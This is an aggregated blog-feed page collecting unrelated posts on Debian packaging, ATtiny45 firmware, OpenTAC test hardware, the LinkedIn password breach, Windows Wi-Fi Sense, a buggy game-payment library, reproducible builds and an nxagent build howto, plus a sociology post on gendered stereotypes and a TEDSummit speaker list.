  • puppet-master-passenger (This package depends on apache2 and libapache2-mod-passenger, and configures a puppet master scaled for more than a handful of puppet agents)

Lots of hugs to the authors, keepers and maintainers of autopkgtest, debci, piuparts and ruby-serverspec for their software. They helped me figure out when I had reached “good enough for experimental”.

Some notes:

  • To use exported resources with puppet 4, you need a puppetdb installation and a relevant puppetdb-terminus package on your puppet master. This is not available in Debian, but is available from Puppet’s repositories.

  • Syntax highlighting for Emacs and Vim are no longer built from the puppet package. Standalone packages will be made.

  • The packaged puppet modules need an overhaul of their dependencies to install alongside this version of puppet. Testing would probably also be great to see if they actually work.

I sincerely hope someone finds this useful. :)

Sociological ImagesIs Michelle Jealous of Melania? Catty Stereotypes and Racist Cartoons

Many are aghast at a cartoon recently released by a well-known right-leaning cartoonist, Ben Garrison. Rightly, commentators are arguing that it reproduces the racist stereotype that African American women are more masculine than white women. I’ll briefly discuss this, but I want to add a twist, too.

The block versus cursive font, the muscularity and the leanness, the strong versus swishy stance, the color and cut of their dresses, the length of their hair, the confrontational versus the compliant facial expression, and the strategically placed, transphobic bulge in Michelle Obama’s dress — you could hardly do a better job of masculinizing Michelle and feminizing Melania.

This is a racist stereotype not only because it posits that black women are unattractive, unlikable, and even dangerous, but because it has its roots in American slavery. We put middle class white women on pedestals, imagining them to be fragile and precious. But if women were fragile and precious, how could we force some of them to do the hard labor we forced on enslaved women? The answer was to defeminize black women. Thanks for keeping the stereotype alive, Ben Garrison.

What I’d like to add as a twist, though, is about Michelle’s expression, purposefully drawn as both ugly and judgmental. Michelle’s face isn’t just drawn as masculine, it’s aimed at Melania and she isn’t just sneering, she’s sneering at this other women.

The cartoon also places women in competition. It tells a sexist story of ugly (black) women who are hateful toward beautiful (white) women. It tells a story in which women are bitter and envious of each other, a ubiquitous story in which women tear each other down and can’t get along. It’s a terrible stereotype, demeaning and untrue (except insofar as patriarchal relations make it so).

And it’s especially reprehensible when it’s layered onto race.

Lisa Wade is a professor at Occidental College and the co-author of Gender: Ideas, Interactions, Institutions. Find her on TwitterFacebook, and Instagram.

(View original at https://thesocietypages.org/socimages)

Planet DebianJonathan McDowell: First steps with the ATtiny45

1 port USB Relay

These days the phrase “embedded” usually means no console (except, if you’re lucky, console on a UART for debugging) and probably busybox for as much of userspace as you can get away with. You possibly have package management from OpenEmbedded or similar, though it might just be a horrible kludged together rootfs if someone hates you. Either way it’s rare for it not to involve some sort of hardware and OS much more advanced than the 8 bit machines I started out programming on.

That is, unless you’re playing with Arduinos or other similar hardware. I’m currently waiting on some ESP8266 dev boards to arrive, but even they’re quite advanced, with wifi and a basic OS framework provided. A long time ago I meant to get around to playing with PICs but never managed to do so. What I realised recently was that I have a ready made USB relay board that is powered by an ATtiny45. First step was to figure out if there were suitable programming pins available, which turned out to be all brought out conveniently to the edge of the board. Next I got out my trusty Bus Pirate, installed avrdude and lo and behold:

$ avrdude -p attiny45 -c buspirate -P /dev/ttyUSB0
Attempting to initiate BusPirate binary mode...
avrdude: Paged flash write enabled.
avrdude: AVR device initialized and ready to accept instructions

Reading | ################################################## | 100% 0.01s

avrdude: Device signature = 0x1e9206 (probably t45)

avrdude: safemode: Fuses OK (E:FF, H:DD, L:E1)

avrdude done.  Thank you.

Perfect. I then read the existing flash image off the device, disassembled it, worked out it was based on V-USB and then proceeded to work out that the only interesting extra bit was that the relay was hanging off pin 3 on IO port B. Which led to me knocking up what I thought should be a functionally equivalent version of the firmware, available locally or on GitHub. It’s worked with my basic testing so far and has confirmed to me I understand how the board is set up, meaning I can start to think about what else I could do with it…

Planet DebianAndy Simpkins: OpenTAC sprint, Cambridge

Last weekend saw a small group get togeather in Cambridge to hack on the OpenTAC.  OpenTAC is an OpenHardware OpenSoftware test platform, designed specificly to aid automated testing and continious intergration.

Aimed at small / mobile / embedded targets OpenTAC v1 provides all of the  support infrastructure to drive up to 8 DUTs (Device Under Test) to your test or CI system.
Each of the 8 EUT ports provides:

  • A serial port (either RS232 levels on an DB9 socket, or 3V3 TTL on a molex kk plug)
  • USB Power (up-to 2A with a software defined fuse, and alarm limits)
  • USB data interconnect
  • Ethernet

All ports on the EUT interface are relay issolated, this means that cables to your EUT can be ‘unplugged’ under software control (we are aware of several SoC development boards that latch up if there is a serial port connected before power is applied).

Additionly there are 8 GPIO lines that can be used as switch controls to any EUT (perhaps to put a specific EUT into a programming mode, reboot it or even start it)

 

Anyway, back to the hacking weekend. ..

 

Joining Steve McIntyre and myself were Mark Brown, and Michael Grzeschik  (sorry Michael, I couldn’t find a homepage).  Mark traveled down from Scotland whilst Michael flew in from Germany for the weekend.  Gents we greatly apprecate you taking the time and expence to join us this weekend.  I should also thank my employer Toby Churchill Ltd. for allowing us to use the office to host the event.

A lot of work got done, and I beleive we have now fully tested and debugged the hardware.  We have also made great progress with the device tree and dvice drivers for the platform.  Mark got the EUT power system working as proof of concept, and has taken an OpenTAC board back with him to turn this into suitable drivers and hopfully push them up stream.  Meanwhile Michael spent his time working on the system portion of the device tree; OpenTAC’s internal power sequancing, thermal managment subsystem, and USB hub control.  Steve  got to grips with the USB serial converters (including how to read and program their internal non-volatile settings).  Finally I was able to explain hardware sequancing to everyone, and to modify boards to overcome some of my design mistakes (the biggest was by far the missing sence resistors for the EUT power managment)

 

 

Krebs on SecurityAs Scope of 2012 Breach Expands, LinkedIn to Again Reset Passwords for Some Users

A 2012 data breach that was thought to have exposed 6.5 million hashed passwords for LinkedIn users instead likely impacted more than 117 million accounts, the company now says. In response, the business networking giant said today that it would once again force a password reset for individual users thought to be impacted in the expanded breach.

leakedinThe 2012 breach was first exposed when a hacker posted a list of some 6.5 million unique passwords to a popular forum where members volunteer or can be hired to hack complex passwords. Forum members managed to crack some the passwords, and eventually noticed that an inordinate number of the passwords they were able to crack contained some variation of “linkedin” in them.

LinkedIn responded by forcing a password reset on all 6.5 million of the impacted accounts, but it stopped there. But earlier today, reports surfaced about a sales thread on an online cybercrime bazaar in which the seller offered to sell 117 million records stolen in the 2012 breach. In addition, the paid hacked data search engine LeakedSource claims to have a searchable copy of the 117 million record database (this service said it found my LinkedIn email address in the data cache, but it asked me to pay $4.00 for a one-day trial membership in order to view the data; I declined).

Inexplicably, LinkedIn’s response to the most recent breach is to repeat the mistake it made with original breach, by once again forcing a password reset for only a subset of its users.

“Yesterday, we became aware of an additional set of data that had just been released that claims to be email and hashed password combinations of more than 100 million LinkedIn members from that same theft in 2012,” wrote Cory Scott, in a post on the company’s blog. “We are taking immediate steps to invalidate the passwords of the accounts impacted, and we will contact those members to reset their passwords. We have no indication that this is as a result of a new security breach.”

LinkedIn spokesman Hani Durzy said the company has obtained a copy of the 117 million record database, and that LinkedIn believes it to be real.

“We believe it is from the 2012 breach,” Durzy said in an email to KrebsOnSecurity. “How many of those 117m are active and current is still being investigated.”

Regarding the decision not to force a password reset across the board back in 2012, Durzy said “We did at the time what we thought was in the best interest of our member base as a whole, trying to balance security for those with passwords that were compromised while not disrupting the LinkedIn experience for those who didn’t appear impacted.”

The 117 million figure makes sense: LinkedIn says it has more than 400 million users, but reports suggest only about 25 percent of those accounts are used monthly.

Alex Holden, co-founder of security consultancy Hold Security, was among the first to discover the original cache of 6.5 million back in 2012 — shortly after it was posted to the password cracking forum InsidePro. Holden said the 6.5 million encrypted passwords were all unique, and did not include any passwords that were simple to crack with rudimentary tools or resources [full disclosure: Holden’s site lists this author as an adviser, however I receive no compensation for that role].

“These were just the ones that the guy who posted it couldn’t crack,” Holden said. “I always thought that the hacker simply didn’t post to the forum all of the easy passwords that he could crack himself.”

The top 20 most commonly used LinkedIn account passwords, according to LeakedSource.

The top 20 most commonly used LinkedIn account passwords, according to LeakedSource.

According to LeakedSource, just 50 easily guessed passwords made up more than 2.2 million of the 117 million encrypted passwords exposed in the breach.

“Passwords were stored in SHA1 with no salting,” the password-selling site claims. “This is not what internet standards propose. Only 117m accounts have passwords and we suspect the remaining users registered using FaceBook or some similarity.”

SHA1 is one of several different methods for “hashing” — that is, obfuscating and storing — plain text passwords. Passwords are “hashed” by taking the plain text password and running it against a theoretically one-way mathematical algorithm that turns the user’s password into a string of gibberish numbers and letters that is supposed to be challenging to reverse. 

The weakness of this approach is that hashes by themselves are static, meaning that the password “123456,” for example, will always compute to the same password hash. To make matters worse, there are plenty of tools capable of very rapidly mapping these hashes to common dictionary words, names and phrases, which essentially negates the effectiveness of hashing. These days, computer hardware has gotten so cheap that attackers can easily and very cheaply build machines capable of computing tens of millions of possible password hashes per second for each corresponding username or email address.

But by adding a unique element, or “salt,” to each user password, database administrators can massively complicate things for attackers who may have stolen the user database and rely upon automated tools to crack user passwords.

LinkedIn said it added salt to its password hashing function following the 2012 breach. But if you’re a LinkedIn user and haven’t changed your LinkedIn password since 2012, your password may not be protected with the added salting capabilities. At least, that’s my reading of the situation from LinkedIn’s 2012 post about the breach.

If you haven’t changed your LinkedIn password in a while, that would probably be a good idea. Most importantly, if you use your LinkedIn password at other sites, change those passwords to unique passwords. As this breach reminds us, re-using passwords at multiple sites that hold personal and/or financial information about you is a less-than-stellar idea.

Planet DebianSteve Kemp: Accidental data-store ..

A few months back I was looking over a lot of different object-storage systems, giving them mini-reviews, and trying them out in turn.

While many were overly complex, some were simple. Simplicity is always appealing, providing it works.

My review of camlistore was generally positive, because I like the design. Unfortunately it also highlighted a lack of documentation about how to use it to scale, replicate, and rebalance.

How hard could it be to write something similar, but also paying attention to keep it as simple as possible? Well perhaps it was too easy.

Blob-Storage

First of all we write a blob-storage system. We allow three operations to be carried out:

  • Retrieve a chunk of data, given an ID.
  • Store the given chunk of data, with the specified ID.
  • Return a list of all known IDs.

 

API Server

We write a second server that consumers actually use, though it is implemented in terms of the blob-storage server listed previously.

The public API is trivial:

  • Upload a new file, returning the ID which it was stored under.
  • Retrieve a previous upload, by ID.

 

Replication Support

The previous two services are sufficient to write an object storage system, but they don't necessarily provide replication. You could add immediate replication; an upload of a file could involve writing that data to N blob-servers, but in a perfect world servers don't crash, so why not replicate in the background? You save time if you only save uploaded-content to one blob-server.

Replication can be implemented purely in terms of the blob-servers:

  • For each blob server, get the list of objects stored on it.
  • Look for that object on each of the other servers. If it is found on N of them we're good.
  • If there are fewer copies than we like, then download the data, and upload to another server.
  • Repeat until each object is stored on sufficient number of blob-servers.

 

My code is reliable, the implementation is almost painfully simple, and the only difference in my design is that rather than having an API-server which allows both "uploads" and "downloads" I split it into two - that means you can leave your "download" server open to the world, so that it can be useful, and your upload-server can be firewalled to only allow a few hosts to access it.

The code is perl-based, because Perl is good, and available here on github:

TODO: Rewrite the thing in #golang to be cool.

TEDMeet the 110 speakers at TEDSummit 2016 (including some of the most popular of all time)

TEDSummit logo

The number is 110: One hundred and ten past and new TED speakers are part of our newest conference, TEDSummit, happening in Banff, Canada, 26–30 June 2016.

And you are invited to join us!

Some of the most popular TED speakers of all time, including Dan Pink, David Gallo, Esther Perel, Kelly and Jane McGonigal, Pico Iyer and dozens more will be joined by brand-new voices including food innovator Josh Tetrick, forest biologists Suzanne Simard, environmental writer Emma Marris, energy experts Joe Lassiter and Michael Shellenberger, blockchain researcher Bettina Warburg, global affairs writer Jonathan Tepperman, empathy scientist Abigail Marsh and more.

About half of these speakers will take the stage to give major TED Talks on topics ranging from advanced digital technologies to climate change to surveillance and transparency … from relationships to brain microscopy … from trust to what humans might look like in 200 years

These 110 speakers will also join — and often lead — workshops and participatory sessions. Look, among the more than 100 sessions, for workshops on the ethics of artificial intelligence, and on the fragility of global megacities … brainstorms on what the TED community might do to help confront the refugee crisis, or on the idea of a female utopia … master classes on social storytelling and on how to think like a scientist … a walk in the woods guided by a forest biologist … even a hands-on genetic manipulation lab.

And there will be planned and unplanned surprises, and of course, outdoor activities in the gorgeous scenery of the Canadian Rocky Mountains.

There are a few seats left to attend TEDSummit. You can find more information and apply here.

And here is the full list of past and new TED speakers who have confirmed their participation in TEDSummit 2016 (subject to change):

Alessandro Acquisti, Privacy economist
Esra’a Al Shafei, Human rights activist
Monica Araya, Activist
Tasso Azevedo, Forester, sustainability activist
Julia Bacha, Filmmaker
Uldus Bakhtiozina, Photographer, visual artist
Benedetta Berti, International policy analyst
Alexander Betts, Refugee scholar
Laila Biali, Musician
Rachel Botsman, Sharing innovator
Laura Boushnak, Photographer
Ed Boyden, Neuroengineer
Steve Boyes, Explorer
Jennifer Bréa, Filmmaker
Erik Brynjolfsson, Innovation researcher
Kitra Cahana, Journalist and conceptual artist
Daniela Candillari, Musician
Jason Clay, Market transformer
Angélica Dass, Photographer
Abe Davis, Computer scientist
Dan Dennett, Philosopher, cognitive scientist
Jamie Drummond, Anti-poverty activist
R. Luke DuBois, Artist, composer, engineer
Zak Ebrahim, Peace activist
Hasan Elahi, Privacy artist
Juan Enriquez, Futurist
Helen Fisher, Anthropologist; expert on love
Melissa Fleming, Voice for refugees
David Gallo, Oceanographer
Casey Gerald, American
Anand Giridharadas, Author
Michael Green, Social progress expert
Michael Green, Architect
Brian Greene, Physicist
Johann Hari, Journalist
Sam Harris, Neuroscientist and philosopher
Gary Haugen, Human rights attorney
Lesley Hazleton, Accidental theologist
Celeste Headlee, Writer and radio host
Margaret Heffernan, Management thinker
Hugh Herr, Bionics designer
Erik Hersman, Blogger, technologist
Hays + Ryan Holladay, Musical artists
John Hunter, Educator
Jedidah Isler, Astrophysicist
Pico Iyer, Global author
Meg Jay, Clinical psychologist
Ellen Jorgensen, Biologist and community science advocate
Sarah Kay, Poet
Kevin Kelly, Digital visionary
Matt Kenyon, New media artist
Ken Lacovara, Paleontologist
David Lang, Maker
Joe Lassiter, Energy scholar
Tim Leberecht, Marketer
Monica Lewinsky, Social activist
Rebecca MacKinnon, Media activist
Pia Mancini, Democracy activist
Emma Marris, Environmental writer
Abigail Marsh, Psychologist
Jane McGonigal, Game designer
Kelly McGonigal, Health psychologist
Lee Mokobe, Poet
Robert Muggah, Megacities expert
Michael Murphy, Designer
Ethan Nadelmann, Drug policy reformer
Iyeoka Okoawo, Singer
Ngozi Okonjo-Iweala, Economist
Dan Pallotta, Charity defender
Amanda Palmer, Musician
Sarah Parcak, Space archaelogist, TED Prize winner
Eli Pariser, Organizer and author
Vikram Patel, Mental health care advocate
Esther Perel, Relationship therapist
Dan Pink, Career analyst
Will Potter, Investigative journalist
Navi Radjou, Innovation strategist
Shai Reshef, Education entrepreneur
Usman Riaz, Percussive guitarist
Joshua Roman, Cellist
Jon Ronson, Writer and filmmaker
Martine Rothblatt, Transhumanist
Juliana Rotich, Tech entrepreneur
Louie Schwartzberg, Filmmaker
eL Seed, Calligraffiti artist
Bill Sellanga, Musician
Graham Shaw, Communication coach
Michael Shellenberger, Climate policy expert
Michael Shermer, Skeptic
Suzanne Simard, Forest biologist
Ernesto Sirolli, Sustainable development expert
Kevin Slavin, Algoworld expert
Christopher Soghoian, Privacy researcher + activist
Andrew Solomon, Writer
Malte Spitz, Politician and data activist
Daniel Suarez, Sci-fi author
Pavan Sukhdev, Environmental economist
Ilona Szabo de Carvalho, Policy reformer
Don Tapscott, Digital strategist
Anastasia Taylor-Lind, Documentary photographer
Marco Tempest, Techno-illusionist
Jonathan Tepperman, Editor, Foreign Affairs
Josh Tetrick, Food innovator
Julian Treasure, Sound consultant
Zeynep Tufekci, Techno-sociologist
Sherry Turkle, Cultural analyst
James Veitch, Comedian and writer
Robert Waldinger, Psychiatrist, psychoanalyst and Zen priest
Bettina Warburg, Blockchain researcher


Krebs on SecurityMicrosoft Disables Wi-Fi Sense on Windows 10

Microsoft has disabled its controversial Wi-Fi Sense feature, a component embedded in Windows 10 devices that shares access to WiFi networks to which you connect with any contacts you may have listed in Outlook and Skype — and, with an opt-in — your Facebook friends.

msoptoutRedmond made the announcement almost as a footnote in its Windows 10 Experience blog, but the feature caused quite a stir when the company’s flagship operating system first debuted last summer.

Microsoft didn’t mention the privacy and security concerns raised by Wi-Fi Sense, saying only that the feature was being removed because it was expensive to maintain and that few Windows 10 users were taking advantage of it.

“We have removed the Wi-Fi Sense feature that allows you to share Wi-Fi networks with your contacts and to be automatically connected to networks shared by your contacts,” wrote Gabe Aul, corporate vice president of Microsoft’s engineering systems team. “The cost of updating the code to keep this feature working combined with low usage and low demand made this not worth further investment. Wi-Fi Sense, if enabled, will continue to get you connected to open Wi-Fi hotspots that it knows about through crowdsourcing.”

Wi-Fi Sense doesn’t share your WiFi network password per se — it shares an encrypted version of that password. But it does allow anyone in your Skype or Outlook or Hotmail contacts lists to waltz onto your Wi-Fi network — should they ever wander within range of it or visit your home (or hop onto it secretly from hundreds of yards away with a good ‘ole cantenna!).

When the feature first launched, Microsoft sought to reassure would-be Windows 10 users that their Wi-Fi password would be sent encrypted and stored encrypted — on a Microsoft server. The company also pointed out that Windows 10 users had to initially agree to share their network during the Windows 10 installation process before the feature would be turned on.

But these assurances rang hollow for many Windows users already suspicious about a feature that could share access to a user’s wireless network even after that user changed their Wi-Fi network password.

“Annoyingly, because they didn’t have your actual password, just authorization to ask the Wi-Fi Sense service to supply it on their behalf, changing your password down the line wouldn’t keep them out – Wi-Fi Sense would learn the new password directly from you and supply it for them in future,” John Zorabedian wrote for security firm Sophos.

Microsoft’s solution for those concerned required users to change the name (a.k.a. “SSID“) of their Wi-Fi network to include the text “_optout” somewhere in the network name (for example, “oldnetworknamehere_optout”).

I commend Microsoft for taking this step, if albeit belatedly. Much security is undone by ill-advised features in software and hardware that are unnecessarily enabled by default.

Worse Than FailureUnprocessed Payments

Ivan worked for a mobile games company that mass-produced “freemium” games. These are the kinds of games you download and play for free, but you can pay for in-game items or perks to make the game easier–or in some cases, possible to beat once you get about halfway through the game.

Since that entire genre is dependent upon microtransactions, you’d think developers would have rock-solid payment code that rarely failed. Code that worked almost all the time, that was nearly unhackable, and would provide a steady stream of microtransactions to pay everybody’s salary. But who am I kidding? This is The Daily WTF! Of course reliable in-app payment code for a company completely dependent on microtransactions isn’t going to happen!

Ivan found himself debugging the company’s core payment library, originally written by a developer named Hanlon who happened to have a PhD in Astrophysics. Hanlon still worked for the company but had moved on to other roles. However, he reported a bug that Ivan had to fix. The payment library would never report PaymentValidationResult.Success, only PaymentValidationResult.Error. In-app purchases were completely broken- across their entire library of released freemium games- and this was obviously unacceptable.

Ivan went spelunking but quickly found that the web service payment did indeed return PaymentValidationResult.Success when a microtransaction was successful. So what was the client-side library doing wrong? He opened that project up and found this:

    PaymentResponse response = _networking.SendRequest(request);
    PaymentValidationResult result = PaymentValidationResult.Success;
    if (response.StatusCode.Is(400))
    {
        result = PaymentValidationResult.Failure;
    }
    else if (response.HasError())
    {
        result = PaymentValidationResult.Error;
    }

    return result;

It assumes from the start that the payment was successful, and only returns an error if the server response explicitely says something bad happened. In the case of timeouts, corruption, or other network errors when a server response is not received, this library would actually report to the application that the microtransaction succeeded, and the player could get free stuff!

But this doesn’t explain why it always failed.

He decided to peek at the response.HasError() function.

    public bool HasError()
    {
        bool hasError = true;

        if (BodyString != null)
        {
            var body = ParseBody();
            if (body != null)
            {
                hasError = body["error_message"] != null;
            }
        }

        return hasError;
    }

This function kind of does the opposite. It assumes an error has always occurred, and then validates and changes its mind if it finds proof that no error occurred. For this to happen, the response it receives from the server must contain a JSON document that does not have an “error_message” key.

Upon re-examining the server-side code, Ivan found that the server simply returns an HTTP status code to indicate payment status, with values of 400 or more indicating error (e.g. 401 = “validation info missing from request”, 402 = “no information retrieved from app store”, 200 = “all good!”). It doesn’t issue any kind of JSON document. Ever. The client code always failed because BodyString was always null.

That’s right, the core business-critical microtransaction library used in all of the company’s freemium games was incapable of actually handling a microtransaction!

Ivan rewrote the PaymentResponse.HasError() function to look like this:

    public bool HasError()
    {
        int responseCode = (int)StatusCode;
        return responseCode >= 400;
    }

They pushed this fix out to the entire company and all its products, issued rounds of updates to the various mobile app stores, and the company started making money, presumably for the first time ever.

[Advertisement] Application Release Automation – build complex release pipelines all managed from one central dashboard, accessibility for the whole team. Download and learn more today!

Planet DebianBits from Debian: Imagination accelerates Debian development for 64-bit MIPS CPUs

Imagination Technologies recently donated several high-performance SDNA-7130 appliances to the Debian Project for the development and maintenance of the MIPS ports.

The SDNA-7130 (Software Defined Network Appliance) platforms are developed by Rhino Labs, a leading provider of high-performance data security, networking, and data infrastructure solutions.

With these new devices, the Debian project will have access to a wide range of 32- and 64-bit MIPS-based platforms.

Debian MIPS ports are also possible thanks to donations from the aql hosting service provider, the Eaton remote controlled ePDU, and many other individual members of the Debian community.

The Debian project would like to thank Imagination, Rhino Labs and aql for this coordinated donation.

More details about GNU/Linux for MIPS CPUs can be found in the related press release at Imagination and their community site about MIPS.

,

Planet DebianReproducible builds folks: Reproducible builds: week 55 in Stretch cycle

What happened in the Reproducible Builds effort between May 8th and May 14th 2016:

Documentation updates

Toolchain fixes

  • dpkg 1.18.7 has been uploaded to unstable, after which Mattia Rizzolo took care of rebasing our patched version.
  • gcc-5 and gcc-6 migrated to testing with the patch to honour SOURCE_DATE_EPOCH
  • Ximin Luo started an upstream discussion with the Ghostscript developers.
  • Norbert Preining has uploaded a new version of texlive-bin with these changes relevant to us:
    • imported Upstream version 2016.20160512.41045 support for suppressing timestamps (SOURCE_DATE_EPOCH) (Closes: #792202)
    • add support for SOURCE_DATE_EPOCH also to luatex
  • cdbs 0.4.131 has been uploaded to unstable by Jonas Smedegaard, fixing these issues relevant to us:
    • #794241: export SOURCE_DATE_EPOCH. Original patch by akira
    • #764478: call dh_strip_nondeterminism if available. Original patch by Holger Levsen
  • libxslt 1.1.28-3 has been uploaded to unstable by Mattia Rizzolo, fixing the following toolchain issues:
    • #823857: backport patch from upstream to provide stable IDs in the genrated documents.
    • #791815: Honour SOURCE_DATE_EPOCH when embedding timestamps in docs. Patch by Eduard Sanou.

Packages fixed

The following 28 packages have become newly reproducible due to changes in their build dependencies: actor-framework ask asterisk-prompt-fr-armelle asterisk-prompt-fr-proformatique coccinelle cwebx d-itg device-tree-compiler flann fortunes-es idlastro jabref konclude latexdiff libint minlog modplugtools mummer mwrap mxallowd mysql-mmm ocaml-atd ocamlviz postbooks pycorrfit pyscanfcs python-pcs weka

The following 9 packages had older versions which were reproducible, and their latest versions are now reproducible again due to changes in their build dependencies: csync2 dune-common dune-localfunctions libcommons-jxpath-java libcommons-logging-java libstax-java libyanfs-java python-daemon yacas

The following packages have become newly reproducible after being fixed:

The following packages had older versions which were reproducible, and their latest versions are now reproducible again after being fixed:

  • klibc/2.0.4-9 by Ben Hutchings.

Some uploads have fixed some reproducibility issues, but not all of them:

Patches submitted that have not made their way to the archive yet:

  • #787424 against emacs24 by Alexis Bienvenüe: order hashes when generating .el files
  • #823764 against sen by Daniel Shahaf: render the build timestamp in a consistent timezone
  • #823797 against openclonk by Alexis Bienvenüe: honour SOURCE_DATE_EPOCH
  • #823961 against herbstluftwm by Fabian Wolff: honour SOURCE_DATE_EPOCH
  • #824049 against emacs24 by Alexis Bienvenüe: make start value of gensym-counter reproducible
  • #824050 against emacs24 by Alexis Bienvenüe: make autoloads files reproducible
  • #824182 against codeblocks by Fabian Wolff: honour SOURCE_DATE_EPOCH
  • #824263 against cmake by Reiner Herrmann: sort file lists from file(GLOB ...)

Package reviews

344 reviews have been added, 125 have been updated and 20 have been removed in this week.

14 FTBFS bugs have been reported by Chris Lamb.

tests.reproducible-builds.org

Misc.

Dan Kegel sent a mail to report about his experiments with a reproducible dpkg PPA for Ubuntu. According to him sudo add-apt-repository ppa:dank/dpkg && sudo apt-get update && sudo apt-get install dpkg should be enough to get reproducible builds on Ubuntu 16.04.

This week's edition was written by Ximin Luo and Holger Levsen and reviewed by a bunch of Reproducible builds folks on IRC.

Planet DebianMehdi Dogguy: Newmaint — Call for help

The process leading to acceptation of new Debian Maintainers is mainly administrative today and is handled by the Newmaint team. In order to simplify this process further, the team wants to integrate their workflow into nm.debian.org's interface so that prospective maintainers can send their application online and the Newmaint team review it from within the website.

We need your help to implement the missing pieces into nm.debian.org. It is written in Python and using Django. If you have some experience with that, you should definitely join the newmaint-site mailing list and ask for the details. Enrico or someone else in the list will do their best to share their vision and explain the needed work in order to get this properly implemented!

It doesn't matter if you're already a Debian Developer to be able to contribute to this project. Anyone can step up and help!

Mark ShuttleworthThank you CC

Just to state publicly my gratitude that the Ubuntu Community Council has taken on their responsibilities very thoughtfully, and has demonstrated a proactive interest in keeping the community happy, healthy and unblocked. Their role is a critical one in the Ubuntu project, because we are at our best when we are constantly improving, and we are at our best when we are actively exploring ways to have completely different communities find common cause, common interest and common solutions. They say that it’s tough at the top because the easy problems don’t get escalated, and that is particularly true of the CC. So far, they are doing us proud.

 

Planet DebianSean Whitton: seoulviasfo

I spent last night in San Francisco on my way from Tucson to Seoul. This morning as I headed to the airport, I caught the end of a shouted conversation between a down-and-out and a couple of middle school-aged girls, who ran away back to the Asian Art museum as the conversation ended. A security guard told the man that he needed him to go away. The wealth divide so visible here just isn’t something you really see around Tucson.

I’m working on a new module for Propellor that’s complicated enough that I need to think carefully about the Haskell in order to write produce a flexible and maintainable module. I’ve only been doing an hour or so of work on it per day, but the past few days I wake up each day with an idea for restructuring yesterday’s code. These ideas aren’t anything new to me: I think I’m just dredging up the understanding of Haskell I developed last year when I was studying it more actively. Hopefully this summer I can learn some new things about Haskell.

Riding on the “Bay Area Rapid Transit” (BART) feels like stepping back in time to the years of Microsoft’s ascendency, before we had a tech world dominated by Google and Facebook: the platform announcements are in a computerised voice that sounds like it was developed in the nineties. They’ll eventually replace the old trains—apparently some new ones are coming in 2017—so I feel privileged to have been able to ride the older ones. I feel the same about the Tube in London.

I really appreciate old but supremely reliable and effective public transport. It reminds me of the Debian toolchain: a bit creaky, but maintained over a sufficiently long period that it serves everyone a lot better than newer offerings, which tend to be produced with ulterior corporate motives.

Planet DebianMark Brown: OpenTAC sprint

This weekend Toby Churchill kindly hosted a hacking weekend for OpenTAC – myself, Michael Grzeschik, Steve McIntyre and Andy Simpkins got together to bring up the remaining bits of the hardware on the current board revision and get some of the low level tooling like production flashing for the FTDI serial ports on the board up and running. It was a very productive weekend, we verified that everything was working with only few small mods needed for the board . Personally the main thing I worked on was getting most of an initial driver for the EMC1701 written. That was the one component without Linux support and allowed us to verify that the power switching and measurement for the systems under test was working well.

There’s still at least one more board revision and quite a bit of software work to do (I’m hoping to get the EMC1701 upstream for v4.8) but it was great to finally see all the physical components of the system working well and see it managing a system under test, this board revision should support all the software development that’s going to be needed for the final board.

Thanks to all who attended, Pengutronix for sponsoring Michael’s attendance and Toby Churchill for hosting!

IMG_2194
IMG_20160515_192336628

Sociological ImagesContrary to Stereotypes, Women Lose More Time in Traffic than Men

“[A]n analysis of traffic can enrich sociological theory.” (Schmidt-Relenberg, 1968: 121)

Almost everywhere we go is a “gendered space.” Although men and women both go to grocery stores, different days of the week and times of the day are associated with different gender compositions of shoppers. Most of our jobs are gendered spaces. In fact, Census data show that roughly 30% of the 66,000,000 women in the U.S. labor force occupy only 10 of the 503 listed occupations on the U.S. Census. You’d probably be able to guess what some of these jobs are just as easily as you might be able to guess some of the very few Fortune 500 companies have women CEOs. Sociologists refer to this phenomenon as occupational segregation, and it’s nothing new. Recently, I did read about a gender segregated space that is new (at least to me): traffic.

2681862958_48eb4d5eb4_z
Photo from kkanous flickr creative commons

When I picture traffic in my head, I think of grumpy men driving to jobs they hate, but this is misleading. Women actually make up the vast majority of congestion on the roads. One way of looking at this is to argue that women are causing more congestion on our roads. But another way to talk about this issue (and the way to talk about this issue that is consistent with actual research) is to say that women endure more congestion on the roads.

Women were actually the first market for household automobiles in the U.S. Men generally traveled to work by public transportation. Cars sold to households were marketed to women for daily errands. This is why, for instance, early automobiles had fancy radiator caps with things like wings, angels and goddesses on them. These were thought to appeal to women’s more fanciful desires.

Traffic increased a great deal when women moved into the labor force. But this is not exactly what accounts for the gender gap. In the 1950s, car trips that were work-related accounted for about 40% of all car use. Today that number is less than 16%. The vast majority of car trips are made for various errands: taking children to school, picking up groceries, eating out, going to or from day care, shopping, and more shopping.  And it’s women who are making most of these trips. It’s a less acknowledged portion of the “second shift” which typically highlights women’s disproportionate contribution to the division of labor inside the household even when they are working outside of the household as well.

Traffic research has shown that women are more than two times more likely than men to be taking someone else where they need to go when driving.  Men are  more likely to be driving themselves somewhere.  Women are also much more likely to string other errands onto the trips in which they are driving themselves somewhere (like stopping at the grocery store on the drive home, going to day care on the way to work, etc.). Traffic experts call this “trip chaining,” but the rest of us call it multi-tasking. What’s more, we also know that women, on average, leave just a bit later than men do for work, and as a result, are much more likely to be making those longer (and more involved) trips right in the middle of peak hours for traffic.

Who knew? It’s an under-acknowledged gendered space that deserves more attention (at least from sociologists). Traffic is awful, and if we count up all that extra time and add it to the second shift calculations made by Arlie Hochschild, I think we have a new form of inequality to complain about.

Tristan Bridges, PhD is a sociologist at the College at Brockport (SUNY). With CJ Pascoe, he is the editor of Exploring Masculinities: Identity, Inequality, Continuity and Change. He blogs at Inequality by (Interior) Design, where this post originally appeared. You can follow Dr. Bridges on Twitter.

(View original at https://thesocietypages.org/socimages)

Planet DebianMike Gabriel: NXv3 Rebase: Build nxagent against X.org 7.0

As already hinted in my previous blog post, here comes a short howto that explains how to test-build nxagent (v3) against a modularized X.org 7.0 source tree.

WARNING: Please note that mixing NX code and X.org code partially turns the original X.org code base into GPL-2 code. We are aware of this situation and work on moving all NXv3 related GPL-2 code into the nxagent DDX code (xserver-xorg/hw/nxagent) or--if possible--dropping it completely. The result shall be a range of patches against X.org (licensable under the same license as the respective X.org files) and a GPL-2 licensed DDX (i.e. nxagent).

How to build this project

For the Brave and Playful

$ git clone https://git.arctica-project.org/nx-X11-rebase/build.git .
$ bash populate.sh sources.lst
$ ./buildit.sh

You can find the built tree in the _install/ sub-directory.

Please note that cloning Git repositories over the https protocol can be considerably slow. If you want to speed things up, consider signing up with our GitLab server.

For Developers...

